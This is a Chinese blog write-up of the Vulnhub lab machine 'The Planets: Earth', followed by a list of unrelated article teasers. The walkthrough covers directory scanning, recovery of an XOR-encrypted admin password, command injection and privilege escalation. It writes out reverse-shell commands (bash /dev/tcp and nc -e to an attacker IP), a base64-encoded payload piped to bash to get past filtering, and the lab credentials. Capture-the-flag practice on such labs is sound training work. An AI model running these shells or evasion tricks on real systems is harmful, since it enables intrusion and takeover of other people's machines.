Vulnhub系列靶机---The Planets: Earth(行星-地球)

Vulnhub系列靶机---The Planets: Earth(行星-地球)

news2024/10/7 10:25:03

文章目录

- - 信息收集
  - - 主机发现
    - 端口扫描
    - 目录扫描
    - dirsearch
  - 漏洞利用
  - - 反弹shell
    - nc文件传输
    - strace调试工具

靶机文档：The Planets: Earth

下载地址：Download (Mirror)

难易程度：Easy

信息收集

主机发现

端口扫描

80端口

需要做映射/etc/hosts

https://earth.local/

https://terratest.earth.local/

目录扫描

扫描http协议是没有结果的，需要对https协议做扫描

dirsearch

dirsearch -u https://earth.local/ -i 200

dirsearch -u https://terratest.earth.local/ -i 200

https://earth.local/admin/login

https://terratest.earth.local/robots.txt

发现除了常规的格式不能访问之外，最后还多了一个Disallow: /testingnotes.*

和上面的后缀格式拼接访问发现txt文件可以访问

访问/testingnotes.txt

得到的信息有：

使用XOR加密
testdata.txt用于测试加密。
terra用作管理门户的用户名

访问/testdata.txt

漏洞利用

https://earth.local/

通过三个秘钥去尝试找到用户名为terra对应的密码

前两个密钥不能用

得到密码：earthclimatechangebad4humans

username: terra

password：earthclimatechangebad4human

来到登陆页面进行登陆

命令执行漏洞

反弹shell

bash -i &> /deb/tcp/192.168.8.8/6868 0>&1

nc 192.168.8.8 6868 -e /bin/bash

只输入base64编码是不行的要结合解码命令

echo "bmMgMTkyLjE2OC44LjggNjg2OCAtZSAvYmluL2Jhc2gK"| base64 -d |bash

反弹到kali机器上

交互式shell

python3 -c "import pty; pty.spawn('/bin/bash')"

尝试sudo -l 没有可以运行sudo的文件

执行 find / -perm -u=s -type f 2>/dev/null 查找一些suid权限文件

但是用户切换失败

nc文件传输

使用nc传输文件

先在kali上输入nc -nlvp 6868 >reset_root，开启监听

在靶机shell上输入nc 192.168.8.8 6868</usr/bin/reset_root

strace调试工具

使用strace工具检测reset_root文件的运行过程，如果没有可以下载安装下

发现文件执行失败是因为少了这三个文件或目录。

因此在靶机shell上创建这三个文件

进入靶机终端进行创键

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

创建完成后执行reset_root

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1015172.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

【算法|虚拟头节点|链表】移除链表元素

【算法|虚拟头节点|链表】移除链表元素

Leetcode203 移除链表元素题目描述： 给你一个链表的头节点 head 和一个整数 val ，请你删除链表中所有满足 Node.val val 的节点，并返回新的头节点。示例 1： 输入：head [1,2,6,3,4,5,6], val 6 输出&#xf…

阅读更多...

Python入门教学——类和对象

Python入门教学——类和对象

目录一、面向过程和面向对象 1、面向过程 2、面向对象二、类三、类对象与类属性 1、类对象 2、类属性四、类方法与静态方法 1、类方法 2、静态方法一、面向过程和面向对象 1、面向过程是一种以过程为中心的编程思想，强调事件的流程和顺序。思想&…

阅读更多...

驱动开发，IO模型，信号驱动IO实现过程

驱动开发，IO模型，信号驱动IO实现过程

1.信号驱动IO框架图分析： 信号驱动IO是一种异步IO方式。linux预留了一个信号SIGIO用于进行信号驱动IO。进程主程序注册一个SIGIO信号的信号处理函数，当硬件数据准备就绪后会发起一个硬件中断，在中断的处理函数中向当前进程发送一个SIGIO信号…

阅读更多...

高内聚低耦合

高内聚低耦合

低耦合元素(方法、类)与元素依赖度不要太高；我们在设计程序时应该降低元素与元素之间的直接关系；降低元素与元素之间的耦合性； 若当前有方法A与方法B，A依赖与B，当B不存在的时候A就不能正常工作，那么就说…

阅读更多...

高可用集群HA、LVS+Keepalived、健康检测

高可用集群HA、LVS+Keepalived、健康检测

keepalived是集群管理中保证集群高可用(HA)的一个服务软件，其功能类似于heartbeat，用来防止单点故障。 2.工作原理 keepalived是以VRRP协议为实现基础的,当backup收不到vrrp包时就认为master宕掉了，这时就需要根据VRRP的优先级来选举一个ba…

阅读更多...

机器学习笔记之无约束优化问题——(阶段性收尾)共轭方向法与Wolfe准则优化方法Python示例

机器学习笔记之无约束优化问题——(阶段性收尾)共轭方向法与Wolfe准则优化方法Python示例

机器学习笔记之无约束优化问题——基于共轭方向法与Wolfe准则优化方法的Python示例引言小插曲：画图——非标准二次型的等值线算法在图像中的表示基于精确搜索的共轭梯度法基于Wolfe准则的共轭梯度法附：共轭梯度法完整代码引言本节使用 Python \text…

阅读更多...

SQL优化--分组优化（group by）

SQL优化--分组优化（group by）

分组操作，我们主要来看看索引对于分组操作的影响。在没有索引的情况下，执行如下SQL，查询执行计划： explain select profession , count(*) from tb_user group by profession ;然后，我们在针对于 profession &#…

阅读更多...

Linux 上的 Wayland 是什么？它与 X 有何不同？

Linux 上的 Wayland 是什么？它与 X 有何不同？

导读Wayland 是 Linux 发行版的替代窗口系统。它取代了老化的 X11 标准。由于它需要修改应用程序才能使用它，因此迄今为止采用速度很慢。在撰写本文时，增强的安全性是相对于 X11 的主要优势。 X11 或 X Window 系统可让您的图形桌面环境显示和控制窗口。…

阅读更多...

【C语言】指针的进阶（一）

【C语言】指针的进阶（一）

目录前言 1. 字符指针 2. 指针数组 3. 数组指针 3.1 数组指针的定义 3.2 &数组名VS数组名 3.3 数组指针的使用 4. 数组参数、指针参数 4.1 一维数组传参 4.2 二维数组传参 4.3 一级指针传参 4.4 二级指针传参 5. 函数指针前言指针在C语言中可谓是有着举足轻重的…

阅读更多...

MySQL夺命20连问

MySQL夺命20连问

博主介绍：✌全网粉丝3W，全栈开发工程师，从事多年软件开发，在大厂呆过。持有软件中级、六级等证书。可提供微服务项目搭建与毕业项目实战，博主也曾写过优秀论文，查重率极低，在这方面有丰富的经验…

阅读更多...

Seata 源码篇之核心思想 - 01

Seata 源码篇之核心思想 - 01

Seata 源码篇之核心思想 - 01 引言基础架构数据源代理分支事务提交和回滚隔离级别解决脏写读未提交读已提交小结笔者个人项目中使用到了seata来做分布式事务管理，面试过程中也经常被问到seata的原理，seata源码本身也不是很复杂，所以准备出一…

阅读更多...

FWT小结

FWT小结

核心思想：把 a , b a,b a,b 化成 f w t ( a ) , f w t ( b ) fwt(a),fwt(b) fwt(a),fwt(b)，相乘后再化为 a a a 化的过程用的是分治所以和FFT其实一模一样 OR / AND 卷积不需要什么技巧，暴力分治转移即可每次分治下去，…

阅读更多...

瑞萨MCU入门教程(非常详细的瑞萨单片机入门教程)

瑞萨MCU入门教程(非常详细的瑞萨单片机入门教程)

瑞萨MCU零基础入门系列教程前言得益于瑞萨强大的MCU、强大的软件开发工具(e studio)，也得益于瑞萨和RA生态工作室提供的支持，我们团队编写了《ARM嵌入式系统中面向对象的模块编程方法》，全书37章，将近500页: 讲解面向对象编程…

阅读更多...

硬件笔记：组装“固态 U 盘”的八年，从 100 块到 1000 块

硬件笔记：组装“固态 U 盘”的八年，从 100 块到 1000 块

这篇文章，聊聊自从 2015 年开始，到目前为止，我使用固态硬盘组装的高速 U 盘，以及它们的使用体验，以及一些明显的坑。写在前面 2015 年的 8 月，我剁手下单了一块 32G 大小，NGFF接口的三星 22x…

阅读更多...

关于 C/C++ 中在指针前加 const 关键字的作用说明

关于 C/C++ 中在指针前加 const 关键字的作用说明

1. 作用说明： 在指针前加 const 的用途为：不可改变指针指向的内存的值，即将该指向指向的内存中的变量置为只读（read-only) 变量。但是，可以给 const 的指针赋值，即将具有 const 属性的指针指向别的内存地…

阅读更多...

Linux 内核镜像分析

Linux 内核镜像分析

文章目录前言一、概述二、bzImage2.1 镜像分析三、zImage3.1 镜像分析参考链接前言介绍了vmlinux的来源，以及分析方法； 一、概述在linux系统中，vmlinux（vmlinuz）是一个包含linux kernel的静态链接的可执行文件…

阅读更多...

JavaScript中的原型继承和类继承之间的区别

JavaScript中的原型继承和类继承之间的区别

聚沙成塔每天进步一点点 ⭐ 专栏简介⭐ 原型继承（Prototype Inheritance）⭐ 类继承（Class Inheritance）⭐ 写在最后 ⭐ 专栏简介前端入门之旅：探索Web开发的奇妙世界记得点击上方或者右侧链接订阅本专栏哦几何带你启…

阅读更多...

MySQL开启安全审计日志，开启查询日志

MySQL开启安全审计日志，开启查询日志

MySQL 查询开启日志在 MySQL 数据库中，开启查询日志是一个非常有用的技术，它能帮助你追踪每一个执行的查询语句，以便更好地优化 SQL 语句和性能。本文将介绍如何在 MySQL 数据库中开启查询日志。开启查询日志 MySQL 中的查询日志是一种记…

阅读更多...

Mysql开启binlog

Mysql开启binlog

本案例基于mysql5.7.16实验 1、在linux中进入mysql查询binlog是否打开，执行命令如下： mysql -u root -p 2、查询binlog是否开启命令如下，如果log_bin为OFF则证明mysql的binlog没有打开 show variables like %log_bin%; 3、退出mysql终端&…

阅读更多...

OPC DA如何实现跨平台

OPC DA如何实现跨平台

目录简介 EntireX DCOM Utgard OPC XML DA OPC UA 协议转换代理简介本文介绍OPC DA跨平台通讯的几种方案。 OPC官方说明文档 OPC（OLE for Process Control）是为过程控制专门设计的OLE 技术，基于COM/DCOM的数据访问的标准。常说的O…

阅读更多...

推荐文章

最新文章